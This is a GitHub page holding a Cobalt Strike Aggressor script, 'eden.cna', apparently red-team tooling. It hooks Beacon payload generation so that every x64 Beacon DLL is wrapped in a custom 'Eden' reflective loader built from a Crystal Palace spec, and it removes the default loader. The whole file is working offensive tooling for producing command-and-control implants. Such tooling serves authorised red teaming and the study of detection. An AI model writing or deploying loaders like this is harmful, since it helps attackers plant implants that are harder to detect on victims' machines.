-
Notifications
You must be signed in to change notification settings - Fork 6
Expand file tree
/
Copy patheden.cna
More file actions
97 lines (86 loc) · 2.88 KB
/
eden.cna
File metadata and controls
97 lines (86 loc) · 2.88 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
# ------------------------------------
# CNA Script for Eden.
# Based on: https://github.com/rasta-mouse/Crystal-Kit/blob/e234f9adafda01b36ec6443e0912a16a1819a980/crystalkit.cna
# ------------------------------------
import crystalpalace.spec.* from: crystalpalace.jar;
import java.util.HashMap;
# ----------------------------------------------
# Print information to the Script Console
# $1 = message
# ----------------------------------------------
sub print_info {
println(formatDate("[HH:mm:ss] ") . "\cE[EDEN]\o " . $1);
}
print_info("[+] Eden.cna loaded!");
# ------------------------------------
# Applies eden ldr to the passed Beacon payload.
#
# $1 = Beacon payload file name
# $2 = Beacon payload (dll binary)
# $3 = Beacon architecture (x86/x64)
#
# returns The Beacon executable payload updated with eden ldr.
# ------------------------------------
sub apply_eden_ldr {
local('$beacon $arch $file_path $spec $final');
$beacon = $2;
$arch = $3;
if ($arch eq "x86") {
warn("[!] Eden ldr is x64 only");
return $null;
}
# Get path to the Eden spec file
$file_path = getFileProper(script_resource(""), "eden.spec");
# Parse the spec file
print_info("Parsing $+ $file_path $+ ...");
$spec = [LinkSpec Parse: $file_path];
if (strlen($spec) == 0) {
warn("[!] Failed to parse eden.spec");
return $null;
}
# Apply the spec / build eden ldr
print_info("Applying Eden ldr spec...");
$final = [$spec run: $beacon, [new HashMap]];
if (strlen($final) == 0) {
warn("[!] Failed to build Eden ldr");
return $null;
}
print_info("[+] Eden ldr payload size: " . strlen($final) . " bytes");
return $final;
}
# ------------------------------------
# Set the BEACON_RDLL_GENERATE Hook
#
# $1 = Beacon payload file name
# $2 = Beacon payload (dll binary)
# $3 = Beacon architecture (x86/x64)
# $4 = User defined options map provided via the restapi
#
# returns The Beacon executable payload updated with eden ldr.
# ------------------------------------
set BEACON_RDLL_GENERATE {
return apply_eden_ldr($1, $2, $3);
}
# ------------------------------------
# Set the BEACON_RDLL_GENERATE_LOCAL Hook
#
# $1 = Beacon payload file name
# $2 = Beacon payload (dll binary)
# $3 = Beacon architecture (x86/x64)
# $4 = Parent beacon ID
# $5 = GetModuleHandleA pointer
# $6 = GetProcAddress pointer
# $7 = User defined options map provided via the restapi
#
# returns The Beacon executable payload updated with eden ldr.
# ------------------------------------
set BEACON_RDLL_GENERATE_LOCAL {
# Not using the parent beacon ID, GetModuleHandleA, or GetProcAddress etc.
return apply_eden_ldr($1, $2, $3);
}
# ------------------------------------
# Remove the reflective loader from the Beacon template (i.e. we just want the Beacon DLL).
# ------------------------------------
set BEACON_RDLL_SIZE {
return "0";
}